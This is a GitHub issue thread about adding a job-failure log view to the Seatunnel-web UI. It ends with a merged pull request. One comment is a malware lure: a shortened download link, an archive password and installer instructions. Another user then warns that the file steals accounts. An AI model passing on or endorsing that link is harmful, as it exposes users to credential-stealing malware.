### ISSUE TITLE
[Improvement] [Seatunnel-web] Add support to provide reason for job failure: UI change

### ISSUE THREAD

**Issue by arshadmohammad** [apache/seatunnel#7509]
### Search before asking

- [X] I had searched in the [feature](https://github.com/apache/seatunnel/issues?q=is%3Aissue+label%3A%22Feature%22) and found no similar feature requirement.

### Description

Job failure log is being stored as part of https://github.com/apache/seatunnel-web/pull/196. 
This issue is for showing the job failure log in the UI.
Behavour should be similar to  "Datasource Parameter" in Datasource list view. User can view the log after clicking the view log link.

### Related issues

https://github.com/apache/seatunnel/issues/7490

### Are you willing to submit a PR?

- [X] Yes I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://www.apache.org/foundation/policies/conduct)

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by BilwaST** [comment]
@arshadmohammad can you assign this to me? I would like to work on it

**Comment by arshadmohammad** [comment]
Thanks @BilwaST for working on this issue.
PR is merged https://github.com/apache/seatunnel-web/commit/f8b9d91eb6985927c4fbb0a401bfd53613813653
